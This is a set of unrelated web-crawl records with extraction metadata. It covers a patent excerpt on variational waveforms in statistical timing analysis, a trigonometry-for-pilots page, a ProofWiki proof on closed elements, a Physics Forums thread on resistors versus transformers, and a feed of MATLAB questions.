Apparently, the required number of voltage levels is a function of the CMOS technology and the waveform shapes. Next, in 620, sensitivities of waveform crossing times to process parameters at the selected voltage levels are computed. This will help to construct the first order canonical form for waveforms crossing times at the selected voltage levels, as explained in step 630. In step 640, the first order canonical form of the maximum of the resulted waveform crossing times at the selected voltage levels is computed by applying a statistical MAX operation to canonical forms of the input waveforms crossing times. The resulting canonical forms contain sensitivities of resulted waveform crossing times to process parameters. Then, in step 650, for each process parameter Xi, a least square fitting problem is constructed to compute coefficients ai, bi, of canonical forms of the resulted waveform time shifting and time stretching terms A and B by matching sensitivities of crossing times for each crossing point of the variational waveform. This will help to compute coefficients ai, bi, of canonical forms A and B by solving the least square fitting problem. In step 660 a least square fitting problem is constructed to compute the sensitivities an+1 and bn+1 of canonical forms A, B to uncorrelated variations by matching standard deviations of crossing times and, thereby, compute coefficients an+1, bn+1 of canonical forms A, B by solving the least square fitting problem. Finally, the resulted variational waveform in the canonical form is computed by using canonical forms of terms A and B in step 670. Similarly, one can compute the statistical minimum of two variational waveforms in the first order canonical form which is critical for calculating the earliest arrival times in a timing run. FIG. 7 shows a schematic of an exemplary computing environment in which a SSTA tool that represents and propagates a variational voltage waveform according to one embodiment of this invention may operate. The exemplary computing environment 700 is only one example of a suitable computing environment and is not intended to suggest any limitation as to the scope of use or functionality of the approach described herein. Neither should the computing environment 700 be interpreted as having any dependency or requirement relating to any one or combination of components illustrated in FIG. 7. In the computing environment 700 there is a computer 702 which is operational with numerous other general purpose or special purpose computing system environments or configurations. Examples of well known computing systems, environments, and/or configurations that may be suitable for use with an exemplary computer 702 include, but are not limited to, personal computers, server computers, thin clients, thick clients, hand-held or laptop devices, multiprocessor systems, microprocessor-based systems, set top boxes, programmable consumer electronics, network PCs, minicomputers, mainframe computers, distributed computing environments that include any of the above systems or devices, and the like. The exemplary computer 702 may be described in the general context of computer-executable instructions, such as program modules, being executed by a computer. Generally, program modules include routines, programs, objects, components, logic, data structures, and so on, that performs particular tasks or implements particular abstract data types. The exemplary computer 702 may be practiced in distributed computing environments where tasks are performed by remote processing devices that are linked through a communications network. In a distributed computing environment, program modules may be located in both local and remote computer storage media including memory storage devices. As shown in FIG. 7, the computer 702 in the computing environment 700 is shown in the form of a general-purpose computing device. The components of computer 702 may include, but are not limited to, one or more processors or processing units 704, a system memory 706, and a bus 708 that couples various system components including the system memory 706 to the processor 704. Bus 708 represents one or more of any of several types of bus structures, including a memory bus or memory controller, a peripheral bus, an accelerated graphics port, and a processor or local bus using any of a variety of bus architectures. By way of example, and not limitation, such architectures include Industry Standard Architecture (ISA) bus, Micro Channel Architecture (MCA) bus, Enhanced ISA (EISA) bus, Video Electronics Standards Association (VESA) local bus, and Peripheral Component Interconnects (PCI) bus. The computer 702 typically includes a variety of computer readable media. Such media may be any available media that is accessible by computer 702, and it includes both volatile and non-volatile media, removable and non-removable media. In FIG. 7, the system memory 706 includes computer readable media in the form of volatile memory, such as random access memory (RAM) 710, and/or non-volatile memory, such as ROM 712. A BIOS 714 containing the basic routines that help to transfer information between elements within computer 702, such as during start-up, is stored in ROM 712. RAM 710 typically contains data and/or program modules that are immediately accessible to and/or presently operated on by processor 704. Computer 702 may further include other removable/non-removable, volatile/non-volatile computer storage media. By way of example only, FIG. 7 illustrates a hard disk drive 716 for reading from and writing to a non-removable, non-volatile magnetic media (not shown and typically called a hard drive), a magnetic disk drive 718 for reading from and writing to a removable, non-volatile magnetic disk 720 (e.g., a floppy disk), and an optical disk drive 722 for reading from or writing to a removable, non-volatile optical disk 724 such as a CD-ROM, DVD-ROM or other optical media. The hard disk drive 716, magnetic disk drive 718, and optical disk drive 722 are each connected to bus 708 by one or more data media interfaces 726. The drives and their associated computer-readable media provide nonvolatile storage of computer readable instructions, data structures, program modules, and other data for computer 702. Although the exemplary environment described herein employs a hard disk 716, a removable magnetic disk 718 and a removable optical disk 722, it should be appreciated by those skilled in the art that other types of computer readable media which can store data that is accessible by a computer, such as magnetic cassettes, flash memory cards, digital video disks, RAMs, ROM, and the like, may also be used in the exemplary operating environment. A number of program modules may be stored on the hard disk 716, magnetic disk 720, optical disk 722, ROM 712, or RAM 710, including, by way of example, and not limitation, an operating system 728, one or more application programs 730, other program modules 732, and program data 734. Each of the operating system 728, one or more application programs 730 other program modules 732, and program data 734 or some combination thereof, may include an implementation of a SSTA that represents and propagates a variational voltage waveform according to one embodiment of this invention. A user may enter commands and information into computer 702 through optional input devices such as a keyboard 736 and a pointing device 738 (such as a mouse). Other input devices (not shown) may include a microphone, joystick, game pad, satellite dish, serial port, scanner, camera, or the like. These and other input devices are connected to the processor unit 704 through a user input interface 740 that is coupled to bus 708, but may be connected by other interface and bus structures, such as a parallel port, game port, or a universal serial bus (USB). An optional monitor 742 or other type of display device is also connected to bus 708 via an interface, such as a video adapter 744. In addition to the monitor, personal computers typically include other peripheral output devices (not shown), such as speakers and printers, which may be connected through output peripheral interface 746. Computer 702 may operate in a networked environment using logical connections to one or more remote computers, such as a remote server/computer 748. Remote computer 748 may include many or all of the elements and features described herein relative to computer 702. Logical connections shown in FIG. 7 are a local area network (LAN) 750 and a general wide area network (WAN) 752. Such networking environments are commonplace in offices, enterprise-wide computer networks, intranets, and the Internet. When used in a LAN networking environment, the computer 702 is connected to LAN 750 via network interface or adapter 754. When used in a WAN networking environment, the computer typically includes a modem 756 or other means for establishing communications over the WAN 752. The modem, which may be internal or external, may be connected to the system bus 708 via the user input interface 740 or other appropriate mechanism. In a networked environment, program modules depicted relative to the personal computer 702, or portions thereof, may be stored in a remote memory storage device. By way of example, and not limitation, FIG. 7 illustrates remote application programs 758 as residing on a memory device of remote computer 748. It will be appreciated that the network connections shown and described are exemplary and other means of establishing a communications link between the computers may be used. An implementation of an exemplary computer 702 may be stored on or transmitted across some form of computer readable media. Computer readable media can be any available media that can be accessed by a computer. By way of example, and not limitation, computer readable media may comprise computer storage media and communications media. Computer storage media include volatile and non-volatile, removable and non-removable media implemented in any method or technology for storage of information such as computer readable instructions, data structures, program modules, or other data. Computer storage media includes, but is not limited to, RAM, ROM, EEPROM, flash memory or other memory technology, CD-ROM, digital versatile disks (DVD) or other optical storage, magnetic cassettes, magnetic tape, magnetic disk storage or other magnetic storage devices, or any other medium which can be used to store the desired information and which can be accessed by a computer. Communication media typically embodies computer readable instructions, data structures, program modules, or other data in a modulated data signal, such as carrier wave or other transport mechanism. Communication media also includes any information delivery media. The term modulated data signal means a signal that has one or more of its characteristics set or changed in such a manner as to encode information in the signal. By way of example, and not limitation, communication media includes wired media such as a wired network or direct-wired connection, and wireless media such as acoustic, RF, infrared, and other wireless media. Combinations of any of the above are also included within the scope of computer readable media. It is apparent that there has been provided by this invention an approach for representing and propagating a variational voltage waveform in statistical static timing analysis of digital circuits. While the invention has been particularly shown and described in conjunction with a preferred embodiment thereof, it will be appreciated that variations and modifications will occur to those skilled in the art. Therefore, it is to be understood that the appended claims are intended to cover all such modifications and changes as fall within the true spirit of the invention. ## Claims 1. A method for statistical static timing analysis of a digital circuit, comprising: developing a variational waveform model to approximate arbitrary waveform transformations of waveforms at nodes of the digital circuit, wherein the variational waveform model transforms a nominal waveform into a perturbed waveform in accordance with a plurality of waveform transformation operators that account for variations that occur between the nominal waveform and the perturbed waveform; and propagating variational waveforms through a timing arc from at least one input to at least one output of the digital circuit in accordance with the variational waveform model. developing a variational waveform model to approximate arbitrary waveform transformations of waveforms at nodes of the digital circuit, wherein the variational waveform model transforms a nominal waveform into a perturbed waveform in accordance with a plurality of waveform transformation operators that account for variations that occur between the nominal waveform and the perturbed waveform; and propagating variational waveforms through a timing arc from at least one input to at least one output of the digital circuit in accordance with the variational waveform model. 2. The method according to claim 1, wherein the plurality of waveform transformation operators comprise time shifting, time stretching, voltage shifting and voltage stretching operators. 3. The method according to claim 1, wherein the plurality of waveform transformation operators are represented in a canonical format. 4. The method according to claim 1, wherein the propagating of variational waveforms comprises determining sensitivities of each of the plurality of waveform transformation operators to a particular source of variation through the timing arc. 5. The method according to claim 1, wherein the propagating of variational waveforms comprises determining a statistical maximum and/or statistical minimum of two variational waveforms through the timing arc. 6. A computer-readable medium storing computer instructions, which when executed, enables a computer system to perform a statistical static timing analysis of a digital circuit, the computer instructions comprising: developing a variational waveform model to approximate arbitrary waveform transformations of waveforms at nodes of the digital circuit, wherein the variational waveform model transforms a nominal waveform into a perturbed waveform in accordance with a plurality of waveform transformation operators that account for variations that occur between the nominal waveform and the perturbed waveform; and propagating variational waveforms through a timing arc from at least one input to at least one output of the digital circuit in accordance with the variational waveform model. developing a variational waveform model to approximate arbitrary waveform transformations of waveforms at nodes of the digital circuit, wherein the variational waveform model transforms a nominal waveform into a perturbed waveform in accordance with a plurality of waveform transformation operators that account for variations that occur between the nominal waveform and the perturbed waveform; and propagating variational waveforms through a timing arc from at least one input to at least one output of the digital circuit in accordance with the variational waveform model. 7. The computer-readable medium according to claim 6, wherein the plurality of waveform transformation operators comprise time shifting, time stretching, voltage shifting and voltage stretching operators. 8. The computer-readable medium according to claim 6, wherein the plurality of waveform transformation operators are represented in a canonical format. 9. The computer-readable medium according to claim 6, wherein the propagating of variational waveforms comprises instructions for determining sensitivities of each of the plurality of waveform transformation operators to a particular source of variation through the timing arc. 10. The computer-readable medium according to claim 6, wherein the propagating of variational waveforms comprises instructions for determining a statistical maximum and/or statistical minimum of two variational waveforms through the timing arc. 11. A statistical static timing analysis tool for analyzing digital circuit designs, comprising: a variational waveform modeling component that is configured to generate a variational waveform model that approximate arbitrary waveform transformations of waveforms at nodes of a digital circuit, wherein the variational waveform model transforms a nominal waveform into a perturbed waveform in accordance with a plurality of waveform transformation operators that account for variations that occur between the nominal waveform and the perturbed waveform; and a variational waveform propagating component configured to propagate variational waveforms through a timing arc from at least one input to at least one output of the digital circuit in accordance with the variational waveform model. a variational waveform modeling component that is configured to generate a variational waveform model that approximate arbitrary waveform transformations of waveforms at nodes of a digital circuit, wherein the variational waveform model transforms a nominal waveform into a perturbed waveform in accordance with a plurality of waveform transformation operators that account for variations that occur between the nominal waveform and the perturbed waveform; and a variational waveform propagating component configured to propagate variational waveforms through a timing arc from at least one input to at least one output of the digital circuit in accordance with the variational waveform model. 12. The tool according to claim 11, wherein the plurality of waveform transformation operators comprise time shifting, time stretching, voltage shifting and voltage stretching operators. 13. The tool according to claim 11, wherein the plurality of waveform transformation operators are represented in a canonical format. 14. The tool according to claim 11, wherein the propagating of variational waveforms comprises determining sensitivities of each of the plurality of waveform transformation operators to a particular source of variation through the timing arc. 15. The tool according to claim 11, wherein the propagating of variational waveforms comprises determining a statistical maximum and/or statistical minimum of two variational waveforms through the timing arc.
2020-09-19 05:00:47
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 19, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.31106412410736084, "perplexity": 1399.5545817792313}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-40/segments/1600400190270.10/warc/CC-MAIN-20200919044311-20200919074311-00544.warc.gz"}
http://code7700.com/trigonometry.htm
the learning never stops! # Math Trig? Do pilots really need to know trigonometry? No. But much of what we do is governed by it and there are times you wonder about all things navigation, lateral and vertical, where a good dose of trig will explain the unexplainable. Figure: Portraits von Pythagoras, from Wikimedia Commons. ### Sum of Angles Figure: Sum of angles in a triangle, from Eddie's notes. If you draw a triangle with one leg parallel to a straight line, you discover that the angles along the parallel leg are equal to the angles opposite the angle that touches the straight line, which by definition is an angle of 180°. So you can infer that the sum of the three angles in a triangle is 180°. If you have a right triangle, you know one of the angles is 90*. That means the sum of the other two angles is 90°. ### Sum of Legs Figure: Right triangle legs, from Eddie's notes. If two sides of a right triangle are known, the third side can be found using the Pythagorean Theorem: ${c}^{2}={a}^{2}+{b}^{2}$ ### Trigonometric Functions #### Sine $sinA=\frac{\mathrm{side opposite A}}{\mathrm{hypotenuse}}=\frac{a}{c}$ #### Cosine $cosA=\frac{\mathrm{side adjacent A}}{\mathrm{hypotenuse}}=\frac{b}{c}$ #### Tangent $tanA=\frac{\mathrm{side opposite A}}{\mathrm{side adjacent A}}=\frac{a}{b}$ #### Cotangent $cotA=\frac{\mathrm{side adjacent A}}{\mathrm{side opposite A}}=\frac{b}{a}$ #### Secant $secA=\frac{\mathrm{hypotenuse}}{\mathrm{side adjacent A}}=\frac{c}{b}$ #### Cosecant $cscA=\frac{\mathrm{hypotenuse}}{\mathrm{side opposite A}}=\frac{c}{a}$ ### Inverse Trigonometric Functions If . . . x = sin y . . . then . . . y = arcsin x If . . . x = cos y . . . then . . . y = arccos x If . . . x = tan y . . . then . . . y = arctan x If . . . x = cot y . . . then . . . y = arccot x If . . . x = sec y . . . then . . . y = arcsec x If . . . x = csc y . . . then . . . y = arccsc x ### A Few Examples #### Circling Offset Figure: 30° Circling offset, from Eddie's notes. The sine of 30° = 0.5, which offers us easy math for many situations. When approaching a runway to circle to the opposite side, for example, one often offsets 30 degrees to establish a downwind. The distance offset is equal to half the distance covered in the offset leg. More about this: Circling Approach. #### Course Deviation Figure: Course azimuth deviation, from Eddie's notes. The tangent of an angle provides the relationship of a triangle's two legs adjacent to the right angle. Multiplied by the distance left to travel, the tangent of an angle will provide course deviation. More about this: Stabilized Approach. #### Crosswinds Figure: Crosswind chart example, from Eddie's notes. Just as the sine of 30° = 0.5, the cosine of 60° = 0.5. You can also figure that the sine of 60 or the cosine of 30° is √3 / 2 = 0.87, almost 90 percent. The cosine or sine of 45° is 1 / √2 = 0.71, almost three-fourths. That leads to a few handy rules of thumb when it comes to crosswinds: • A thirty degree crosswind is equal to one-half the full wind factor. • A forty-five degree crosswind is equal to three-fourths the full wind factor. • A sixty degree crosswind is equal to ninety percent of the full wind factor. #### Vertical Navigation on Approach Figure: AGL vs. DME to go, from Eddie's notes. We often use 300 feet per nautical mile as a wag for how high we should be on final approach. It is pretty close to a three degree glide path, convenient eh? It is more than convenience, it is trignonometry. The real number, as it turns out, is 318 feet per nautical mile: $\mathrm{Height}=6076\left(\mathrm{tan}3°\right)=318\mathrm{feet}$
2019-01-17 15:17:46
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 8, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8194902539253235, "perplexity": 1207.8533335452487}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-04/segments/1547583658988.30/warc/CC-MAIN-20190117143601-20190117165601-00192.warc.gz"}
https://proofwiki.org/wiki/Equivalence_of_Definitions_of_Closed_Element
# Equivalence of Definitions of Closed Element ## Theorem Let $\struct {S, \preceq}$ be an ordered set. Let $\cl$ be a closure operator on $S$. Let $x \in S$. The following definitions of the concept of Closed Element are equivalent: ### Definition 1 The element $x$ is a closed element of $S$ (with respect to $\cl$) if and only if $x$ is a fixed point of $\cl$: $\map \cl x = x$ ### Definition 2 The element $x$ is a closed element of $S$ (with respect to $\cl$) if and only if $x$ is in the image of $\cl$: $x \in \Img \cl$ ## Proof Let $\struct {S, \preceq}$ be an ordered set. Let $\cl: S \to S$ be a closure operator on $S$. Let $x \in S$. By the definition of closure operator, $\cl$ is idempotent. An element of $S$ is a fixed point of $\cl$ if and only if it is in the image of $\cl$. Thus the above definitions are equivalent. $\blacksquare$
2020-05-27 21:39:01
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9600577354431152, "perplexity": 80.27485323475388}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-24/segments/1590347396163.18/warc/CC-MAIN-20200527204212-20200527234212-00399.warc.gz"}
https://www.physicsforums.com/threads/resistors-vs-transformers.282261/
Resistors vs transformers 1. Dec 31, 2008 RalphM Hello, I am new here and this looks like a good place to get answers! Wondering if someone could clarify something for me. When withdrawing current from a socket to an electrical device, the current is determined by I= V/R. So the manufacturer of the device can add resistors to manipulate the current going through. Correct? My second question is that instead of adding resistors to decrease current can the manufacturer just add a transformer instead which will decrease voltage to produce the same current, and if so, does that mean that transformers and resistors can be interchangeable for this particular application? would there a preference for using either? 2. Dec 31, 2008 Naty1 Hello Ralph...sounds like you may be beginning to study electricity!! Sometimes this is done but in practice it is avoided because the resistor utilizes power....and gives off heat...to no purpose....much more efficient to design the circuit for minimum power (minimum current) use....Such impedance matching might more practical in amplifiers for very low power applications.... Sure, but that becomes expensive.. a smart designer would avoid such a costly application. And again, the solution depends on the application... Consider light bulbs, for example... Many materials might be used, but it turns out tungston in a vacuum has the longevity and resistance characteristics to work pretty well. Yet a fluorescent (gas) type bulb is considerably more efficient and hence can support the additional cost of a "ballast"....see wikipedia, fluorescent lamp, for a more complete discussion. (This also spreads toxic mercury.) 3. Dec 31, 2008 stewartcs Not quite, using a transformer to reduce the voltage will increase the current proportionately since the power the load uses is the same (think conservation of energy). By halving the voltage the current in the secondary will be doubled: $$\frac{V_p}{V_s} = \frac{I_s}{I_p}$$ The benefit of a transformer would be to reduce transmission line losses since they are equal to I^2R. Hence, pumping up the voltage and sending the same VA will reduce the current and thus the line loss. Hope this helps. CS 4. Jan 1, 2009 montoyas7940 If he were to use a transformer to lower the voltage applied to a resistive load the current and power would both decrease. Current through the transformer secondary will be determined by the load. (up to a point ) I= E/R and P= IE 5. Jan 1, 2009 RalphM Thank you for the responses! I'm still not clear on a few things: For example: Let's say a manufacturer creates a device and minimizes the resistance of it as much as possible to minimize power losses. Since the resistance of this device is constant and the voltage from the socket is also constant then the current/power through the device are determined by I = V/R and P=VI and are both fixed. What if the current/power is too much for the device to work properly? What is done to extract the required amount of power/current from the socket while keeping the resistance at the minimum? Also, what determines the amount of power required by the device in the first place? Responses are appreciated! HAPPY NEW YEAR! 6. Jan 1, 2009 stewartcs True, however, the load (or component) is designed to work under specific conditions (i.e. requires a certain amount of power to operate properly). So given that the power is constant in the load (or within some design range), one cannot simply reduce the voltage arbitrarily (and thus current in the secondary and power the load draws) to limit the current. The complete circuit would need to be designed with all of that in mind which probably wouldn't be the most practical way to limit current. Good point though. CS 7. Jan 1, 2009 stewartcs Happy New Year to you too! Most devices work within some power range (i.e. a minimum requirement for it to work and a maximum that it can withstand). If the power (some combination of current and voltage) is too little or too much, the device will not operate or it will fail. Hence, the device must be designed with this in mind. In other words, the designer will ensure that the device's resistance is such that at the operating voltage it will not draw too much power (beyond the devices limit), or too little power (not enough to operate). Hope this helps. CS 8. Jan 1, 2009 Staff: Mentor Welcome to the PF, RalphM! 9. Jan 1, 2009 Integral Staff Emeritus Electronic devices are designed to perform a task. The accomplishment of that task is the primary concern of the designer. Power consumption by a device is determined by the various electronic components used to accomplish the design goals. A good design will keep power consumption to a minimum while accomplishing the original task. A device uses exactly as much current, or power if you wish, as it needs. The power supply does not control the amount of current drawn unless the capabilities of the supply is exceeded. The current draw is determined by the load. For example; you can run your tape player on your cars 12v battery even though it only draws a few hunderd milliamps. The battery is capable of driving the starter motor which can draw nearly a 100amps. Perhaps Ivan Seeking will drop in and discuss some of the methods he has used to extend battery life when the current draw of a circiut is high. 10. Jan 1, 2009 RalphM Thanks guys you've cleared up a lot. I feel I'm starting to get a deeper understanding. I'm still a bit unclear about power consumption. For example: Let's say you connect the hot and neutral of your 120VAC socket with a 1 Ohm wire. Then I = 120 Amps from I=V/R. Power = 14400 Watts from P=VI. Does this mean that you are losing/wasting 14400 Watts of power? If you use a 10 Ohm wire instead of the 1 Ohm wire the I = 12 amps and power is 1440Watts. It seems that the conclusion to be drawn is that you save on power by using a wire (or device) with higher resistance. This doesn't seem correct. Can someone please point out the logical flaw? 11. Jan 1, 2009 Redbelly98 Staff Emeritus There is no flaw, your conclusions are entirely correct. 12. Jan 2, 2009 montoyas7940 If the wire is intended to be the power consuming device this is correct. You have described as an example a simple resistance heater. All of the electrical power is converted to heat. Just for fun you could pull one of the heating elements out of your stove and measure the resistance. Your statement may not seem correct to you because you are only considering a wire. If you have a VERY low resistance wire providing electricity to a 10 ohm load then (for the most part) the 10 ohm load is what determines the power consumed. (This is only if the source is adequate of course) The wire is not as significant. In real world applications such as the electrical circuits in your house the resistance of the wiring has to be considered. If you have a load that is large (low resistance) then you need lower resistance wire providing the power. Normally this is done with larger gauge wire or using copper instead of aluminum. If the wire is inadequate it will heat because it is consuming power. The term used for the adequacy of wire is ampacity. 13. Jan 2, 2009 RalphM Since the hot and neutral wires have a resistance and that resistance is the minimum that a circuit can have assuming you connect them with a wire having 0 Ohm. Does that mean that the maximum power that can be extracted from an outlet is constant and can be calculated as follows: V= 120V R = Rmin (resistance of hot and neutral wires) I = 120 / Rmin P = (120 * 120) / Rmin And let's say that you did connect them with the 0 Ohm wire what happens to all the power. Does it just all get wasted into the earth (except for a small amount that heats the hot and neutral wires)? 14. Jan 2, 2009 montoyas7940 Yes, but you will trip the circuit over-current protection before you reach the theoretical max current. 15 amps at 14 AWG copper wire for example. This is called a short circuit and without circuit over-current protection the conductors will be destroyed by the heat thus opening the circuit and perhaps burning down the house. Last edited: Jan 2, 2009 15. Jan 2, 2009 RalphM in your reply to the first paragraph you mention "circuit protectors" and in the second you mention circuit "over-current protection". Is this the same thing? Thanks for the replies you've helped a lot. 16. Jan 2, 2009 montoyas7940 Yes, sorry to have been unclear. Circuit over-current protection is often circuit breakers or fuses. There are many different types and applications. I am very glad if I have helped, you are welcome. Edit: I fixed post 14 Last edited: Jan 2, 2009 17. Jan 2, 2009 Staff: Mentor BTW, a general comment on power transfer.... Do not forget to include the source impedance in your calculations. True, for AC Mains power distribution, the source impedance is pretty low, but it is not negligible. For example, have you ever seen your lights flicker briefly as a high-current motor appliance starts up (like your garage compressor, or your workshop table saw)? That's due to source voltage droop at the high-current part of the motor startup. EDIT -- The Rsource I'm mentioning is a combination of the impedance of the power pole distribution transformer (low) plus the resistance of the wiring getting down into the home and out into the various branches in the home. 18. Jan 2, 2009 montoyas7940 Here is an example of the effects of a short circuit: I don't know if I can say where specifically, but a large research facility here in the south uses large motors (about 44,000 hp each). They are synchronous motors and on shutdown an operator (not me, I don't work there) did not shut down stator current. The result was, as the motor slowed and the back emf dropped to zero the current through the stator tried to approach the theoretical limit. As you might imagine the source is large and the stator windings are (well... were) large. The supply transformer has over-current protection but it was configured improperly so it did not trip and was destroyed. The line from TVA is 161,000 volts, it was damaged also before the substation providing the 161k shut down. Large holes were blown in the motor frame (several inches thick) and the windings were vaporized. Not your typical pinched extension cord, but yet the same in theory. 19. Jan 2, 2009 Staff: Mentor You can actually use this fact to understand why a low resistance draws more power in home circuit. The maximum power transfer is always obtained when the source impedance matches the load impedance. Voltage sources are inherently low impedance so low load impedances result in high power for a voltage source. On the other hand, current sources are inherently high impedance so high load impedances give high power for a current source.
2017-01-24 13:49:34
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6082327365875244, "perplexity": 1090.7872105027443}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284411.66/warc/CC-MAIN-20170116095124-00097-ip-10-171-10-70.ec2.internal.warc.gz"}
http://stackexchange.com/filters/29247/matlab
Matlab ## Image stitching use Harris corner detector in matlab I want to create a panorama from multiple photos on matlab image. I'm find out about the "Image Stitching". Hope you give me detailed instructions. . ## regionprops vs. findContours Is there a way to get the same results for cDist=regionprops(bwImg, 'Area'); and openCV's findContours? Here is what I have tried so far: dst.convertTo(dst,CV_8U); ... ## How to read hdf data in Octave I am doing project in remote sensing. Working with HDF on matlab is very easy. But i want to implement this with grid computing (Ubuntu). So i am trying with octave. I have HDF4 files of chlorophyll. ... ## Matlab and Mathematica : Finding the density function The pdf of a standard Gamma distribution is $f(x) = \frac{x^{\gamma-1} \exp(-x)}{\Gamma(\gamma)}$. How do I find the pdf of of the random variable Z = X + Y where Y is the Normal distribution? There ... ## Do 1-D convolution along each row of a matrix Did a quick search and couldn't find much about this. Say I have a 2D matrix and a 1D 'response function'. I want to convolve each row of the 2D matrix with the response function. I can do this by: ... 1 answers | 2 hours ago by Draper on stackoverflow.com ## Quickly and efficiently calculating an eigenvector for known eigenvalue Short version of my question: What would be the optimal way of calculating an eigenvector for a matrix A, if we already know the eigenvalue belonging to the eigenvector? Longer explanation: I have ... ## Sorting two column vectors into 3D matrix based on position Using the imfindcircles function in MATLAB to track circles in two images. I start with approximately a grid of circles which deforms. I am trying to sort the two column vector from imfindcircles into ... 1 answers | 2 hours ago by Cryptomnesia on stackoverflow.com ## Mode in each row closest to first index - MATLAB I have a matrix of numbers and I want to find the mode of each row, however I want to use the item closest to index 1 if there are multiple modes (built in function just uses the smallest value) for ... 1 answers | 2 hours ago by Alex Musk on stackoverflow.com ## Matching images with different orientations and scales in MATLAB I have two images that are similar but differ in orientation and size. One example can be seen below: Is there a way to match the two images? I have used Procrustes shape analysis, but are there ... ## Absorption Refrigerator evaporator code error I'm an undergraduate student working on a simulation for an absorption refrigerator. I found this PhD level thesis that had MATLAB code for the evaporator for an absorption refrigeration system, which ... ## Iterative closest point (ICP) for Matlab with Covariance computation does anybody know an implementation for the Iterative Closest Point (ICP) algorithm in Matlab that computes the covariance matrix? All i have found is the icptoolboxformatlab but it seems to be ... 1 answers | 4 hours ago by Marvin Dietsch on stackoverflow.com ## How to plot data from scope that is used in external mode simulation? I have a simulink model connected to my hardware and I am able to see the response on my scope when I change the setpoints in my model etc. But I will like to save this data from the scope so that ... ## How to find integral under the noise power spectrum in matlab I have the 2D noise power spectrum (Matrix). How can I get integral under the noise spectrum in Matlab. Will the sum of the matrix element only give me integral?. I am doing to evaluate a correctness ... ## How to make scrolling up in 2014a Matlab Command Prompt case sensitive? In the Matlab command prompt, "scrolling" up by the arrow up key or mouse scroll with a starting string already entered will roll back to the last commands with the same starting string. I am using ... ## array contains values of sample wav file in python or matlab I'm new at python and matlab, I tried to program using both language I couldn't get the right result. I want take a wav file as input and give an array which contains values of samples of the audio ... ## Alternate between Executing a MATLAB file and a Python script I have a MATLAB file that currently saves its variables into a .mat workspace. The python script uses SciPy.io to read these variables from the workspace. The python script performs some operations ... 1 answers | 5 hours ago by Borat.sagdiyev on stackoverflow.com ## How to eliminate the errors around edge boundaries after cutting out the Image? I'm making an image processing project which has a 6-step algorithm and I'm stuck in one of these. First off all, the platform I using is MATLAB, so if you can supply some samples it would be great. ... ## Plot a big figure with many subfigures in matlab I have to print a large poster, containing a matrix of figures, and it would be very practical for me to let MATLAB arrange them. Unluckily, subplots are displayed to fit a certain figure size, so are ... ## openCV and cvBlobs not giving same results as matlab here is my matlab code: % Calculate each separated object area cDist=regionprops(bwImg, 'Area'); cDist=[cDist.Area]; % Label each object [bwImgLabeled, ~]=bwlabel(bwImg); % ... ## Proper way to add noise to signal In many areas I have found that while adding noise, we mention some specification like zero mean and variance. I need to add AWGN, colored noise, uniform noise of varying SNR in Db. The following code ... 3 answers | 9 hours ago by SKM on stackoverflow.com ## Error: Undefined function or 